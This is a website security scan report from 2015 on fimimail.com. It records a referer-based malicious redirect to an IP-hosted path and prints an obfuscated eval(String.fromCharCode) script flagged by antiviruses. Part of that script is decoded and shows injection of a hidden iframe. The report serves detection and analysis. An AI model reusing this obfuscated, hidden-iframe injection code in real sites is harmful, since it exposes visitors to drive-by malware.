Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.fimimail.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.fimimail.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Mar 2015 19:31:17 GMT Location: http://216.120.231.11/~aggieba/coppermine/include/ Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.fimimail.com/ | 200 OK Content-Length: 8352 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.fimimail.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 21 Mar 2015 19:31:17 GMT Location: http://216.120.231.11/~aggieba/coppermine/include/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://216.120.231.11/~aggieba/coppermine/include/ | 404 Not Found Content-Length: 2042 Content-Type: text/html | clean |
http://216.120.231.11/test404page.js | 404 Not Found Content-Length: 2014 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fimimail.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fimimail.com/
Result: fimimail.com is not infected or malware details are not published yet.
Result: fimimail.com is not infected or malware details are not published yet.